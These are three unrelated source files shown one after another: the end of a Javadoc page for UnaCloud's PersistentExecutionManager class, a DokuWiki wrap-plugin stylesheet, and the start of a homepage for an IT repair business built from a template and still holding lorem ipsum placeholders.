<th class="colOne" scope="col">Constructor and Description</th>
</tr>
<tr class="altColor">
<td class="colOne"><code><strong><a href="../../../../uniandes/unacloud/agent/execution/PersistentExecutionManager.html#PersistentExecutionManager()">PersistentExecutionManager</a></strong>()</code> </td>
</tr>
</table>
</li>
</ul>
<!-- ========== METHOD SUMMARY =========== -->
<ul class="blockList">
<li class="blockList"><a name="method_summary">
<!-- -->
</a>
<h3>Method Summary</h3>
<table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Method Summary table, listing methods, and an explanation">
<caption><span>Methods</span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Method and Description</th>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static void</code></td>
<td class="colLast"><code><strong><a href="../../../../uniandes/unacloud/agent/execution/PersistentExecutionManager.html#cleanDir(java.io.File)">cleanDir</a></strong>(java.io.File f)</code>
<div class="block">Delete directory sent by params</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../../uniandes/unacloud/common/com/UnaCloudAbstractResponse.html" title="class in uniandes.unacloud.common.com">UnaCloudAbstractResponse</a></code></td>
<td class="colLast"><code><strong><a href="../../../../uniandes/unacloud/agent/execution/PersistentExecutionManager.html#extendsVMTime(uniandes.unacloud.common.com.messages.exeo.ExecutionAddTimeMessage)">extendsVMTime</a></strong>(<a href="../../../../uniandes/unacloud/common/com/messages/exeo/ExecutionAddTimeMessage.html" title="class in uniandes.unacloud.common.com.messages.exeo">ExecutionAddTimeMessage</a> timeMessage)</code>
<div class="block">Extends the time that the execution must be up</div>
</td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static void</code></td>
<td class="colLast"><code><strong><a href="../../../../uniandes/unacloud/agent/execution/PersistentExecutionManager.html#refreshData()">refreshData</a></strong>()</code>
<div class="block">Loads and validates status of all executions saved in file</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static void</code></td>
<td class="colLast"><code><strong><a href="../../../../uniandes/unacloud/agent/execution/PersistentExecutionManager.html#removeExecution(long,%20boolean)">removeExecution</a></strong>(long executionId,
boolean checkTime)</code>
<div class="block">Stops an execution and removes it representing execution object</div>
</td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../../uniandes/unacloud/common/com/UnaCloudAbstractResponse.html" title="class in uniandes.unacloud.common.com">UnaCloudAbstractResponse</a></code></td>
<td class="colLast"><code><strong><a href="../../../../uniandes/unacloud/agent/execution/PersistentExecutionManager.html#restartMachine(uniandes.unacloud.common.com.messages.exeo.ExecutionRestartMessage)">restartMachine</a></strong>(<a href="../../../../uniandes/unacloud/common/com/messages/exeo/ExecutionRestartMessage.html" title="class in uniandes.unacloud.common.com.messages.exeo">ExecutionRestartMessage</a> restartMessage)</code>
<div class="block">Restarts the given execution</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static java.util.List<java.lang.Long></code></td>
<td class="colLast"><code><strong><a href="../../../../uniandes/unacloud/agent/execution/PersistentExecutionManager.html#returnIdsExecutions()">returnIdsExecutions</a></strong>()</code>
<div class="block">Returns a list of id executions that currently are running,
not return images in state STARTING (testing running)</div>
</td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../../uniandes/unacloud/common/com/UnaCloudAbstractResponse.html" title="class in uniandes.unacloud.common.com">UnaCloudAbstractResponse</a></code></td>
<td class="colLast"><code><strong><a href="../../../../uniandes/unacloud/agent/execution/PersistentExecutionManager.html#sendImageCopy(uniandes.unacloud.common.com.messages.exeo.ExecutionSaveImageMessage)">sendImageCopy</a></strong>(<a href="../../../../uniandes/unacloud/common/com/messages/exeo/ExecutionSaveImageMessage.html" title="class in uniandes.unacloud.common.com.messages.exeo">ExecutionSaveImageMessage</a> message)</code>
<div class="block">Sends an image copied to server</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static java.lang.String</code></td>
<td class="colLast"><code><strong><a href="../../../../uniandes/unacloud/agent/execution/PersistentExecutionManager.html#startUpMachine(uniandes.unacloud.agent.execution.entities.Execution,%20boolean)">startUpMachine</a></strong>(<a href="../../../../uniandes/unacloud/agent/execution/entities/Execution.html" title="class in uniandes.unacloud.agent.execution.entities">Execution</a> execution,
boolean started)</code>
<div class="block">Starts and configures an execution. this method must be used by other methods to configure, start and schedule an execution</div>
</td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static void</code></td>
<td class="colLast"><code><strong><a href="../../../../uniandes/unacloud/agent/execution/PersistentExecutionManager.html#stopExecution(long)">stopExecution</a></strong>(long executionId)</code>
<div class="block">Stops execution</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static void</code></td>
<td class="colLast"><code><strong><a href="../../../../uniandes/unacloud/agent/execution/PersistentExecutionManager.html#unregisterExecution(long)">unregisterExecution</a></strong>(long executionId)</code>
<div class="block">Unregister execution from platforms</div>
</td>
</tr>
</table>
<ul class="blockList">
<li class="blockList"><a name="methods_inherited_from_class_java.lang.Object">
<!-- -->
</a>
<h3>Methods inherited from class java.lang.Object</h3>
<code>equals, getClass, hashCode, notify, notifyAll, toString, wait, wait, wait</code></li>
</ul>
</li>
</ul>
</li>
</ul>
</div>
<div class="details">
<ul class="blockList">
<li class="blockList">
<!-- ========= CONSTRUCTOR DETAIL ======== -->
<ul class="blockList">
<li class="blockList"><a name="constructor_detail">
<!-- -->
</a>
<h3>Constructor Detail</h3>
<a name="PersistentExecutionManager()">
<!-- -->
</a>
<ul class="blockListLast">
<li class="blockList">
<h4>PersistentExecutionManager</h4>
<pre>public PersistentExecutionManager()</pre>
</li>
</ul>
</li>
</ul>
<!-- ============ METHOD DETAIL ========== -->
<ul class="blockList">
<li class="blockList"><a name="method_detail">
<!-- -->
</a>
<h3>Method Detail</h3>
<a name="removeExecution(long, boolean)">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>removeExecution</h4>
<pre>public static void removeExecution(long executionId,
boolean checkTime)</pre>
<div class="block">Stops an execution and removes it representing execution object</div>
<dl><dt><span class="strong">Parameters:</span></dt><dd><code>executionId</code> - </dd><dd><code>checkTime</code> - </dd></dl>
</li>
</ul>
<a name="stopExecution(long)">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>stopExecution</h4>
<pre>public static void stopExecution(long executionId)</pre>
<div class="block">Stops execution</div>
<dl><dt><span class="strong">Parameters:</span></dt><dd><code>executionId</code> - </dd></dl>
</li>
</ul>
<a name="unregisterExecution(long)">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>unregisterExecution</h4>
<pre>public static void unregisterExecution(long executionId)</pre>
<div class="block">Unregister execution from platforms</div>
<dl><dt><span class="strong">Parameters:</span></dt><dd><code>executionId</code> - </dd></dl>
</li>
</ul>
<a name="cleanDir(java.io.File)">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>cleanDir</h4>
<pre>public static void cleanDir(java.io.File f)</pre>
<div class="block">Delete directory sent by params</div>
<dl><dt><span class="strong">Parameters:</span></dt><dd><code>f</code> - directory or file</dd></dl>
</li>
</ul>
<a name="restartMachine(uniandes.unacloud.common.com.messages.exeo.ExecutionRestartMessage)">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>restartMachine</h4>
<pre>public static <a href="../../../../uniandes/unacloud/common/com/UnaCloudAbstractResponse.html" title="class in uniandes.unacloud.common.com">UnaCloudAbstractResponse</a> restartMachine(<a href="../../../../uniandes/unacloud/common/com/messages/exeo/ExecutionRestartMessage.html" title="class in uniandes.unacloud.common.com.messages.exeo">ExecutionRestartMessage</a> restartMessage)</pre>
<div class="block">Restarts the given execution</div>
<dl><dt><span class="strong">Returns:</span></dt><dd>response to server</dd></dl>
</li>
</ul>
<a name="startUpMachine(uniandes.unacloud.agent.execution.entities.Execution, boolean)">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>startUpMachine</h4>
<pre>public static java.lang.String startUpMachine(<a href="../../../../uniandes/unacloud/agent/execution/entities/Execution.html" title="class in uniandes.unacloud.agent.execution.entities">Execution</a> execution,
boolean started)</pre>
<div class="block">Starts and configures an execution. this method must be used by other methods to configure, start and schedule an execution</div>
<dl><dt><span class="strong">Parameters:</span></dt><dd><code>execution</code> - to be configured</dd><dd><code>started</code> - if execution should be started</dd>
<dt><span class="strong">Returns:</span></dt><dd>result message</dd></dl>
</li>
</ul>
<a name="extendsVMTime(uniandes.unacloud.common.com.messages.exeo.ExecutionAddTimeMessage)">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>extendsVMTime</h4>
<pre>public static <a href="../../../../uniandes/unacloud/common/com/UnaCloudAbstractResponse.html" title="class in uniandes.unacloud.common.com">UnaCloudAbstractResponse</a> extendsVMTime(<a href="../../../../uniandes/unacloud/common/com/messages/exeo/ExecutionAddTimeMessage.html" title="class in uniandes.unacloud.common.com.messages.exeo">ExecutionAddTimeMessage</a> timeMessage)</pre>
<div class="block">Extends the time that the execution must be up</div>
<dl><dt><span class="strong">Parameters:</span></dt><dd><code>timeMessage</code> - message with execution id and time to be modified</dd>
<dt><span class="strong">Returns:</span></dt><dd>unacloud response</dd></dl>
</li>
</ul>
<a name="refreshData()">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>refreshData</h4>
<pre>public static void refreshData()</pre>
<div class="block">Loads and validates status of all executions saved in file</div>
</li>
</ul>
<a name="returnIdsExecutions()">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>returnIdsExecutions</h4>
<pre>public static java.util.List<java.lang.Long> returnIdsExecutions()</pre>
<div class="block">Returns a list of id executions that currently are running,
not return images in state STARTING (testing running)</div>
<dl><dt><span class="strong">Returns:</span></dt><dd>list of execution ids</dd></dl>
</li>
</ul>
<a name="sendImageCopy(uniandes.unacloud.common.com.messages.exeo.ExecutionSaveImageMessage)">
<!-- -->
</a>
<ul class="blockListLast">
<li class="blockList">
<h4>sendImageCopy</h4>
<pre>public static <a href="../../../../uniandes/unacloud/common/com/UnaCloudAbstractResponse.html" title="class in uniandes.unacloud.common.com">UnaCloudAbstractResponse</a> sendImageCopy(<a href="../../../../uniandes/unacloud/common/com/messages/exeo/ExecutionSaveImageMessage.html" title="class in uniandes.unacloud.common.com.messages.exeo">ExecutionSaveImageMessage</a> message)</pre>
<div class="block">Sends an image copied to server</div>
<dl><dt><span class="strong">Parameters:</span></dt><dd><code>message</code> - </dd>
<dt><span class="strong">Returns:</span></dt><dd>unacloud response</dd></dl>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</div>
</div>
<!-- ========= END OF CLASS DATA ========= -->
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar_bottom">
<!-- -->
</a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li class="navBarCell1Rev">Class</li>
<li><a href="class-use/PersistentExecutionManager.html">Use</a></li>
<li><a href="package-tree.html">Tree</a></li>
<li><a href="../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../index-files/index-1.html">Index</a></li>
<li><a href="../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="../../../../uniandes/unacloud/agent/execution/ImageCacheManager.html" title="class in uniandes.unacloud.agent.execution"><span class="strong">Prev Class</span></a></li>
<li><a href="../../../../uniandes/unacloud/agent/execution/Scheduler.html" title="class in uniandes.unacloud.agent.execution"><span class="strong">Next Class</span></a></li>
</ul>
<ul class="navList">
<li><a href="../../../../index.html?uniandes/unacloud/agent/execution/PersistentExecutionManager.html" target="_top">Frames</a></li>
<li><a href="PersistentExecutionManager.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<div>
<ul class="subNavList">
<li>Summary: </li>
<li>Nested | </li>
<li>Field | </li>
<li><a href="#constructor_summary">Constr</a> | </li>
<li><a href="#method_summary">Method</a></li>
</ul>
<ul class="subNavList">
<li>Detail: </li>
<li>Field | </li>
<li><a href="#constructor_detail">Constr</a> | </li>
<li><a href="#method_detail">Method</a></li>
</ul>
</div>
<a name="skip-navbar_bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
</body>
</html>
|
lib/plugins/wrap/style.css
|
brontosaurusrex/dokuwiki-preconfigured
|
/********************************************************************
Screen Styles for the Wrap Plugin (additional to all.css)
********************************************************************/
/* box
********************************************************************/
.dokuwiki .wrap_box {
background: __background_alt__;
color: __text__;
}
.dokuwiki div.wrap_box,
.dokuwiki div.wrap_danger,
.dokuwiki div.wrap_warning,
.dokuwiki div.wrap_caution,
.dokuwiki div.wrap_notice,
.dokuwiki div.wrap_safety {
padding: 1em 1em .5em;
margin-bottom: 1.5em;
overflow: hidden;
}
.dokuwiki span.wrap_box,
.dokuwiki span.wrap_danger,
.dokuwiki span.wrap_warning,
.dokuwiki span.wrap_caution,
.dokuwiki span.wrap_notice,
.dokuwiki span.wrap_safety {
padding: 0 .3em;
}
/*____________ notes with icons ____________*/
/* general styles for all note divs */
.dokuwiki div.wrap_info,
.dokuwiki div.wrap_important,
.dokuwiki div.wrap_alert,
.dokuwiki div.wrap_tip,
.dokuwiki div.wrap_help,
.dokuwiki div.wrap_todo,
.dokuwiki div.wrap_download {
padding: 1em 1em .5em 70px;
margin-bottom: 1.5em;
min-height: 68px;
background-position: 10px 50%;
background-repeat: no-repeat;
color: inherit;
overflow: hidden;
}
/* general styles for all note spans */
.dokuwiki span.wrap_info,
.dokuwiki span.wrap_important,
.dokuwiki span.wrap_alert,
.dokuwiki span.wrap_tip,
.dokuwiki span.wrap_help,
.dokuwiki span.wrap_todo,
.dokuwiki span.wrap_download {
padding: 0 2px 0 20px;
min-height: 20px;
background-position: 2px 50%;
background-repeat: no-repeat;
color: inherit;
}
/* sorry for icons glued to the right side, but there is currently no way
to make this look good without adjusting the images themselves */
[dir=rtl] .dokuwiki div.wrap_info,
[dir=rtl] .dokuwiki div.wrap_important,
[dir=rtl] .dokuwiki div.wrap_alert,
[dir=rtl] .dokuwiki div.wrap_tip,
[dir=rtl] .dokuwiki div.wrap_help,
[dir=rtl] .dokuwiki div.wrap_todo,
[dir=rtl] .dokuwiki div.wrap_download {
padding: 1em 60px .5em 1em;
background-position: right 50%;
}
[dir=rtl] .dokuwiki span.wrap_info,
[dir=rtl] .dokuwiki span.wrap_important,
[dir=rtl] .dokuwiki span.wrap_alert,
[dir=rtl] .dokuwiki span.wrap_tip,
[dir=rtl] .dokuwiki span.wrap_help,
[dir=rtl] .dokuwiki span.wrap_todo,
[dir=rtl] .dokuwiki span.wrap_download {
padding: 0 18px 0 2px;
background-position: right 50%;
}
/*____________ info ____________*/
.dokuwiki .wrap_info { background-color: #d1d7df; }
.dokuwiki .wrap__dark.wrap_info { background-color: #343e4a; }
.dokuwiki div.wrap_info { background-image: url(images/note/48/info.png); }
.dokuwiki span.wrap_info { background-image: url(images/note/16/info.png); }
/*____________ important ____________*/
.dokuwiki .wrap_important { background-color: #ffd39f; }
.dokuwiki .wrap__dark.wrap_important { background-color: #6c3b00; }
.dokuwiki div.wrap_important { background-image: url(images/note/48/important.png); }
.dokuwiki span.wrap_important { background-image: url(images/note/16/important.png); }
/*____________ alert ____________*/
.dokuwiki .wrap_alert { background-color: #ffbcaf; }
.dokuwiki .wrap__dark.wrap_alert { background-color: #6b1100; }
.dokuwiki div.wrap_alert { background-image: url(images/note/48/alert.png); }
.dokuwiki span.wrap_alert { background-image: url(images/note/16/alert.png); }
/*____________ tip ____________*/
.dokuwiki .wrap_tip { background-color: #fff79f; }
.dokuwiki .wrap__dark.wrap_tip { background-color: #4a4400; }
.dokuwiki div.wrap_tip { background-image: url(images/note/48/tip.png); }
.dokuwiki span.wrap_tip { background-image: url(images/note/16/tip.png); }
/*____________ help ____________*/
.dokuwiki .wrap_help { background-color: #dcc2ef; }
.dokuwiki .wrap__dark.wrap_help { background-color: #3c1757; }
.dokuwiki div.wrap_help { background-image: url(images/note/48/help.png); }
.dokuwiki span.wrap_help { background-image: url(images/note/16/help.png); }
/*____________ todo ____________*/
.dokuwiki .wrap_todo { background-color: #c2efdd; }
.dokuwiki .wrap__dark.wrap_todo { background-color: #17573e; }
.dokuwiki div.wrap_todo { background-image: url(images/note/48/todo.png); }
.dokuwiki span.wrap_todo { background-image: url(images/note/16/todo.png); }
/*____________ download ____________*/
.dokuwiki .wrap_download { background-color: #d6efc2; }
.dokuwiki .wrap__dark.wrap_download { background-color: #345717; }
.dokuwiki div.wrap_download { background-image: url(images/note/48/download.png); }
.dokuwiki span.wrap_download { background-image: url(images/note/16/download.png); }
/*____________ safety notes ____________*/
.dokuwiki .wrap_danger {
background-color: #c00;
color: #fff;
}
.dokuwiki .wrap_warning {
background-color: #f60;
color: #000;
}
.dokuwiki .wrap_caution {
background-color: #ff0;
color: #000;
}
.dokuwiki .wrap_notice {
background-color: #06f;
color: #fff;
}
.dokuwiki .wrap_safety {
background-color: #090;
color: #fff;
}
/* mark
********************************************************************/
.dokuwiki .wrap_hi {
background-color: #ff9;
overflow: hidden;
}
.dokuwiki .wrap__dark.wrap_hi {
background-color: #4e4e0d;
}
/* miscellaneous
********************************************************************/
/*____________ spoiler ____________*/
.dokuwiki .wrap_spoiler {
background-color: __background__ !important;
color: __background__ !important;
border: 1px dotted red;
}
/*____________ only print ____________*/
.dokuwiki .wrap_onlyprint {
display: none;
}
/*____________ tabs ____________*/
/* in addition to template styles */
.dokuwiki .plugin_wrap.tabs {
margin-bottom: 1.4em;
}
|
seawaterfox.com/main/index.html
|
SeaWater-Fox/swf-website
|
<!--
Author: W3layouts
Author URL: http://w3layouts.com
License: Creative Commons Attribution 3.0 Unported
License URL: http://creativecommons.org/licenses/by/3.0/
-->
<!DOCTYPE html>
<html>
<head>
<title>SeaWater Fox - Exquisite IT Services</title>
<link rel='shortcut icon' href='swf_icon.ico' type='image/x-icon' />
<link href="../res/css/bootstrap.css" rel='stylesheet' type='text/css' />
<!-- Custom Theme files -->
<link href="css/style.css?ver=0.000000000006" rel="stylesheet" type="text/css" media="all" />
<!-- Custom Theme files -->
<script src="../res/js/jquery.min.js"></script>
<!-- Custom Theme files -->
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script type="application/x-javascript"> addEventListener("load", function() { setTimeout(hideURLbar, 0); }, false); function hideURLbar(){ window.scrollTo(0,1); } </script>
<!--webfont-->
<link href='//fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800' rel='stylesheet' type='text/css'>
<link href='//fonts.googleapis.com/css?family=Lato:100,300,400,700,900,100italic,300italic,400italic,700italic,900italic' rel='stylesheet' type='text/css'>
<!-- FontAwesome -->
<link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/font-awesome/4.4.0/css/font-awesome.min.css">
<!-- Owl Stylesheets -->
<link rel="stylesheet" href="css/flexslider.css?ver=0.1" type="text/css" media="screen" />
<script type="text/javascript" src="js/move-top.js"></script>
<script type="text/javascript" src="js/easing.js"></script>
<script type="text/javascript">
jQuery(document).ready(function($) {
$(".scroll").click(function(event){
event.preventDefault();
$('html,body').animate({scrollTop:$(this.hash).offset().top},1200);
});
});
</script>
<!--Animation-->
<script src="js/wow.min.js"></script>
<link href="css/animate.css" rel='stylesheet' type='text/css' />
<script>
new WOW().init();
</script>
</head>
<body>
<!-- header-section-starts -->
<div class="header" id="home">
<div class="container">
<div class="logo wow fadeInRight" data-wow-delay="0.4s">
<a href="#"><img src="images/logo.png" alt="" /></a>
</div>
<span class="menu"></span>
<div class="top-menu wow fadeInLeft" data-wow-delay="0.4s">
<ul>
<li><a class="active scroll hvr-shutter-out-horizontal" href="#home">Home</a></li>
<li><a class="scroll hvr-shutter-out-horizontal" href="#service">Service & Attributes</a></li>
<li><a class="scroll hvr-shutter-out-horizontal" href="#about">About us</a></li>
<li><a class="scroll hvr-shutter-out-horizontal" href="#pricing">Hourly Rates</a></li>
<li><a class="scroll hvr-shutter-out-horizontal" href="#work">How it works</a></li>
<li><a class="scroll hvr-shutter-out-horizontal" href="#clients">Happy Clients</a></li>
<li><a class="scroll hvr-shutter-out-horizontal" href="#contact">Contact Us</a></li>
</ul>
</div>
<!-- script for menu -->
<script>
$( "span.menu" ).click(function() {
$( ".top-menu" ).slideToggle( "slow", function() {
// Animation complete.
});
});
</script>
<!-- script for menu -->
<div class="clearfix"></div>
</div>
</div>
<div class="banner wow fadeInUp" data-wow-delay="0.4s">
<div class="container">
<div class="banner-info text-center">
<h2 class="wow bounceInLeft" data-wow-delay="0.4s">Elegant service without the grand price</h2>
<p class="wow bounceInLeft" data-wow-delay="0.4s">Computer repair, network troubleshooting, and miscellaneous technological support. iOS, Linux, Windows, Mac OS X, and DD-WRT.</p>
<br />
<!--<div class="details wow fadeInLeft" data-wow-delay="0.4s">
<form>
<li>
<input type="text" class="text" value="Full Name" onfocus="this.value = '';" onblur="if (this.value == '') {this.value = 'Full Name';}">
<a class="name" href="#"></a>
</li>
<li>
<input type="text" class="text" value="Email Address" onfocus="this.value = '';" onblur="if (this.value == '') {this.value = 'Email Address';}">
<a class="mail" href="#"></a>
</li>
<li>
<input type="text" class="text" value="Phone Number" onfocus="this.value = '';" onblur="if (this.value == '') {this.value = 'Phone Number';}">
<a class="num" href="#"></a>
</li>
<input type="submit" value="Request a quote">
</form>
</div>-->
</div>
<div class="header-bottom">
<div class="right-grid-1">
<section class="slider">
<div class="flexslider">
<ul class="slides">
<!-- Slide ratio is as follows: 1.587301587301587 -->
<li>
<img src="images/picture1_keyboard.jpg" class="img-responsive" alt="" />
</li>
<li>
<img src="images/os3.jpg" class="img-responsive" alt="" />
</li>
<li>
<img src="images/square_ccs.png" class="img-responsive" alt="" />
</li>
</ul>
</div>
</section>
<!-- FlexSlider -->
<script defer src="js/jquery.flexslider.js"></script>
<script type="text/javascript">
$(window).load(function(){
$('.flexslider').flexslider({
animation: "slide",
start: function(slider){
$('body').removeClass('loading');
}
});
});
</script>
</div>
</div>
</div>
</div>
<div class="content">
<div class="service-section" id="service">
<div class="container">
<div class="service-section-head text-center wow fadeInRight" data-wow-delay="0.4s">
<h3>Our Services<!-- & Core Attributes--></h3> <!-- No, no... just service.. no, no... -->
<p>Making sure that technology is adequately serviced since 2015.</p>
</div>
<div class="service-section-grids">
<div class="col-md-6 service-grid">
<div class="service-section-grid wow bounceIn" data-wow-delay="0.4s">
<div class="icon">
<i class="fa fa-wrench"></i>
</div>
<div class="icon-text">
<h4>General Repair</h4>
<p>iPhone acting funny? Experiencing the infamous Blue Screen of Death? We can fix it; satisfaction guaranteed or your money back!<br /></p>
</div>
<div class="clearfix"></div>
</div>
<div class="service-section-grid wow bounceIn" data-wow-delay="0.4s">
<div class="icon">
<i class="fa fa-wifi"></i>
</div>
<div class="icon-text">
<h4>Network Troubleshooting</h4>
<p>Many desktop publishing packages and web page editors now use Lorem Ipsum as their default model text, and a search for 'lorem ipsum' will uncover many web sites still in their infancy</p>
</div>
<div class="clearfix"></div>
</div>
<div class="service-section-grid wow bounceIn" data-wow-delay="0.4s">
<div class="icon">
<i class="fa fa-cloud"></i>
</div>
<div class="icon-text">
<h4>Free Online Support</h4>
<p>We are proud to offer online support for free, across the globe. Find us on <a href="https://www.facebook.com/seawaterfox">Facebook</a>, <a href="https://www.twitter.com/seawaterfox">Twitter</a>, or <a href="mailto://contact@seawaterfox.com">shoot us an email</a> for quick help, no matter your location.</p>
</div>
<div class="clearfix"></div>
</div>
</div>
<div class="col-md-6 service-grid">
<div class="service-section-grid wow bounceIn" data-wow-delay="0.4s">
<div class="icon">
<i class="fa fa-cog"></i>
</div>
<div class="icon-text">
<h4>Custom PC Building</h4>
<p>Many desktop publishing packages and web page editors now use Lorem Ipsum as their default model text, and a search for 'lorem ipsum' will uncover many web sites still in their infancy</p>
</div>
<div class="clearfix"></div>
</div>
<div class="service-section-grid wow bounceIn" data-wow-delay="0.4s">
<div class="icon">
<i class="fa fa-battery-full"></i>
</div>
<div class="icon-text">
<h4>Optimizations / Tune-Ups</h4>
<p>There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form, by injected humouror randomised words which don't look even slightly believable.</p>
</div>
<div class="clearfix"></div>
</div>
<div class="service-section-grid wow bounceIn" data-wow-delay="0.4s">
<div class="icon">
<i class="fa fa-terminal"></i>
</div>
<div class="icon-text">
<h4>Website Management (LAMP & LEMP)</h4>
<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer.</p>
</div>
<div class="clearfix"></div>
</div>
</div>
<div class="clearfix"></div>
</div>
</div>
</div>
<div class="about-section" id="about">
<div class="col-md-6 about_left wow bounceInLeft">
<img src="images/about_pic.jpg" alt="" />
</div>
<div class="col-md-6 about_right wow bounceInRight">
<h3>About us</h3>
<p>Founded in 2015, SeaWater Fox is an upcoming technology-orientated business that specializes in creating a better tomorrow through intricate software and service. We strive to deliver exemplary electronic support and opportunity to a wide audience, servicing the greater Niles area.<br />
SeaWater Fox focuses on Christian-based philosophies and actions: prompt, kind spirited service. This also means that SeaWater Fox is not open on Sundays to take the time to worship and encourage others to do the same.</p>
<a href="#">Read more</a>
</div>
<div class="clearfix"></div>
</div>
<div class="price-section" id="pricing">
<div class="container">
<div class="price-section-head text-center wow fadeInLeft" data-wow-delay="0.4s">
<h3>Pricing Structure</h3>
<p>One price simply doesn't fit all.</p>
</div>
<div class="price-section-grids">
<div class="col-md-4 price-value text-center wow fadeInLeft" data-wow-delay="0.4s">
<div class="price-section-grid">
<h5>Express Service</h5>
<h3><span>$</span>10</h3>
<p>for 30 minutes (or less) of service</p>
<ul>
<li>Pay only for what you need</li>
<li>Small, easy fixes and services</li>
<li>Full service, less time</li>
</ul>
<!-- <a href="#">Learn More</a> -->
</div>
</div>
<div class="col-md-4 price-value text-center wow fadeInUp" data-wow-delay="0.6s">
<div class="price-section-grid">
<h5>Standard Service</h5>
<h3><span>$</span>25</h3>
<p>per hour</p>
<ul>
<li>General Troubleshooting</li>
<li>General Installation</li>
<li>Discountable</li>
</ul>
<!-- <a href="#">Learn More</a> -->
</div>
</div>
<div class="col-md-4 price-value text-center wow fadeInRight" data-wow-delay="0.4s">
<div class="price-section-grid">
<h5>Advanced Service</h5>
<h3><span>$</span>50</h3>
<p>per hour</p>
<ul>
<li>Service / Deployment Consulting</li>
<li>Advanced Installation</li>
<li>Satisfaction Guaranteed</li>
</ul>
<!-- <a href="#">Learn More</a> -->
</div>
</div>
<div class="clearfix"></div>
</div>
</div>
</div>
<div class="work-section" id="work">
<div class="container">
<div class="work-section-head text-center wow fadeInRight" data-wow-delay="0.4s">
<h3>How it works</h3>
<p>A preview into the intricate interworkings of our technicians.</p>
</div>
<div class="work-section-grids text-center wow fadeInUp" data-wow-delay="0.4s">
<div class="col-md-3 work-section-grid">
<i class="ear-phones"></i>
<h4>Step 1</h4>
<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been</p>
<span class="arrow1"><img src="images/arrow1.png" alt="" /></span>
</div>
<div class="col-md-3 work-section-grid wow fadeInUp" data-wow-delay="0.6s">
<i class="lock"></i>
<h4>Step 2</h4>
<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been</p>
<span class="arrow2"><img src="images/arrow2.png" alt="" /></span>
</div>
<div class="col-md-3 work-section-grid wow fadeInUp" data-wow-delay="0.8s">
<i class="cloud"></i>
<h4>Step 3</h4>
<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been</p>
<span class="arrow1"><img src="images/arrow1.png" alt="" /></span>
</div>
<div class="col-md-3 work-section-grid wow fadeInUp" data-wow-delay="0.10s">
<i class="done"></i>
<h4>Step 4</h4>
<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been</p>
</div>
<div class="clearfix"></div>
<a class="work scroll" href="#contact">Get in touch</a>
</div>
</div>
</div>
<div class="happy-clients" id="clients">
<div class="container">
<div class="happy-clients-head text-center wow fadeInRight" data-wow-delay="0.4s">
<h3>Happy Clients</h3>
<p>Be sure that we are a reliable solution. Don't worry, we'll wait.</p>
</div>
<div class="happy-clients-grids">
<div class="col-md-6 happy-clients-grid wow bounceIn" data-wow-delay="0.4s">
<div class="client">
<img src="images/client_1.jpg" alt="" />
</div>
<div class="client-info">
<p><img src="images/open-quatation.jpg" class="open" alt="" />Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make.<img src="images/close-quatation.jpg" class="closeq" alt="" /></p>
<h4><a href="#">Darwin Michle, </a>Project manager</h3>
</div>
<div class="clearfix"></div>
</div>
<div class="col-md-6 happy-clients-grid span_66 wow bounceIn" data-wow-delay="0.4s">
<div class="client">
<img src="images/client_2.jpg" alt="" />
</div>
<div class="client-info">
